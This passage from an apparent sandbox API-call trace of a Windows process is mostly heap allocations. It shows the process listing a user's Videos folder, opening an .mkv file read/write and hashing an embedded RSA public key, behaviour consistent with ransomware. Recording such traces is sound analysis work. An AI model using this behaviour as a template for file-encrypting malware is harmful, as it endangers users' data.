lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.110] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\") returned="z2E0zT\\" [0200.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f810 [0200.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.111] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0200.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f810 | out: hHeap=0x620000) returned 1 [0200.111] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0200.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0200.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0200.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.112] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.113] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.113] PathFindFileNameW (pszPath="") returned="" [0200.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.113] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0200.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.115] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaa471670, ftCreationTime.dwHighDateTime=0x1d89ebe, ftLastAccessTime.dwLowDateTime=0x8d18f590, ftLastAccessTime.dwHighDateTime=0x1d8a0a9, ftLastWriteTime.dwLowDateTime=0x8d18f590, ftLastWriteTime.dwHighDateTime=0x1d8a0a9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.115] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4078e50, ftCreationTime.dwHighDateTime=0x1d89b53, ftLastAccessTime.dwLowDateTime=0xec5e4820, ftLastAccessTime.dwHighDateTime=0x1d8a4b4, ftLastWriteTime.dwLowDateTime=0xec5e4820, ftLastWriteTime.dwHighDateTime=0x1d8a4b4, nFileSizeHigh=0x0, nFileSizeLow=0x15e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g5znGT5HlbHq.mkv", cAlternateFileName="G5ZNGT~1.MKV")) returned 1 [0200.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0200.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.115] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\g5znGT5HlbHq.mkv") returned=".mkv" [0200.115] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\g5znGT5HlbHq.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\g5zngt5hlbhq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.123] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=5603) returned 1 [0200.123] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.126] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x15bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.126] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.128] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.128] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x15e3, lpOverlapped=0x0) returned 1 [0200.137] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.138] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.138] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0200.139] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.139] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.139] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.139] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.139] GetLastError () returned 0x0 [0200.139] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.139] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0200.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.140] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.140] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.140] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x15e0) returned 0x2ea99b0 [0200.140] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f810 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3260 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f858 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3278 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32c0 [0200.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.142] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0200.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0200.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32c0 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea32a8 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0200.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0200.150] GetCurrentThreadId () returned 0x66c [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7d28 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0200.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.151] GetCurrentThreadId () returned 0x66c [0200.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3308 [0200.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0200.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32c0 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3320 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3338 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32d8 [0200.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.154] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32a8 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 